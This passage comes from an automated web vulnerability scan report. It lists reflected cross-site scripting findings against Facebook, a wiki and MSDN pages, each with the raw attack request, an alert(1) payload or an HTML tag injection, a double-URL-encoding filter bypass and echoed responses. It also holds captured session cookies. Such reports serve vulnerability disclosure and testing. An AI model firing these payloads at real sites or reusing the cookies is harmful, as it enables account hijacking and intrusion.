Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Sat, 11 Dec 2010 18:00:30 GMT
Server: Apache
Content-Length: 106
Set-Cookie: JSESSIONID=10vZND8pxx1kb88rC5wnwyXY12p8SVCYpyYQVGlrlvwg1t74CmgJ!1267178989; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html

Invalid path /eventcenter/recording3e04b<img src=a onerror=alert(1)>edd90b20f19/recordAction was requested

2.11. https://graph.facebook.com/oauth/authorize [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://graph.facebook.com
Path:   /oauth/authorize

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9802<script>alert(1)</script>e9157f8b18e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that the response below is served with Content-Type: text/javascript and a JSON body rather than as an HTML document; the injected markup only executes if a browser renders this response as HTML (for example through content sniffing), so exploitability in a given browser should be confirmed manually.

Request

GET /oauth/authorizee9802<script>alert(1)</script>e9157f8b18e?client_id=8744a0ccdce1491c4474dacf75dc2d12&redirect_uri=http://www.myspace.com/fbocallback&scope=email,offline_access,user_about_me,user_birthday,user_likes,publish_stream&display=popup HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown OAuth 2.0 method, authorizee9802<script>alert(1)</script>e9157f8b18e."
Set-Cookie: datr=QbcDTSBbj9Vvh3G0O-kWlzIe; expires=Mon, 10-Dec-2012 17:39:13 GMT; path=/; domain=.facebook.com; httponly
Connection: close
Date: Sat, 11 Dec 2010 17:39:13 GMT
Content-Length: 151

{
"error": {
"type": "OAuthException",
"message": "Unknown OAuth 2.0 method, authorizee9802<script>alert(1)</script>e9157f8b18e."
}
}

2.12. http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mike2.openmethodology.org
Path:   /wiki/Fusing_Enterprise_Search_and_Social_Bookmarking

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73a62"%3balert(1)//831b24e6265 was submitted in the REST URL parameter 2. This input was echoed as 73a62";alert(1)//831b24e6265 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62"%3balert(1)//831b24e6265 HTTP/1.1
Host: mike2.openmethodology.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 18:13:19 GMT
Server: Apache/2.2.17 (Unix)
X-Powered-By: PHP/5.2.14
Pragma: no-cache
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: openmeth_omwikidb_omw__session=o23sch2m9uit36jtq3cp8c5ho7; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<script type="text/javascript">a2a_linkname="Fusing Enterprise Search and Social Bookmarking73a62";alert(1)//831b24e6265";a2a_linkurl="http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62%22;alert(1)//831b24e6265";    a2a_onclick=1;</script>
...[SNIP]...

2.13. http://msdn.microsoft.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d48"><a>3d147823d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?f6d48"><a>3d147823d73=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25588
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?f6d48"><a>3d147823d73=1" />
...[SNIP]...

2.14. http://msdn.microsoft.com/cc300389.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /cc300389.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5db99"><a>00ccaba71ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cc300389.aspx?5db99"><a>00ccaba71ba=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30835
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/cc300389.aspx?5db99"><a>00ccaba71ba=1" />
...[SNIP]...

2.15. http://msdn.microsoft.com/en-us/library(d=loband [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library(d=loband

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b5a%2522%253e%253ca%253e034bccb92c5 was submitted in the REST URL parameter 1. This input was echoed as 76b5a"><a>034bccb92c5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us76b5a%2522%253e%253ca%253e034bccb92c5/library(d=loband HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; 
ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us76b5a"><a>034bccb92c5/library(d=loband" />
...[SNIP]...

2.16. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155072.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb1e%2522%253e%253ca%253e76f5534360f was submitted in the REST URL parameter 1. This input was echoed as dfb1e"><a>76f5534360f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usdfb1e%2522%253e%253ca%253e76f5534360f/library/aa155072.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; 
ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdfb1e"><a>76f5534360f/library/aa155072" />
...[SNIP]...

2.17. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155072.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9866b%2522%253e%253ca%253e65c7083c4f8 was submitted in the REST URL parameter 2. This input was echoed as 9866b"><a>65c7083c4f8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9866b%2522%253e%253ca%253e65c7083c4f8/aa155072.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9866b"><a>65c7083c4f8/aa155072" />
...[SNIP]...

2.18. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/aa155072.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d906d%2522%253e%253ca%253eab4656b12f7 was submitted in the REST URL parameter 3. This input was echoed as d906d"><a>ab4656b12f7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa155072.aspxd906d%2522%253e%253ca%253eab4656b12f7 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
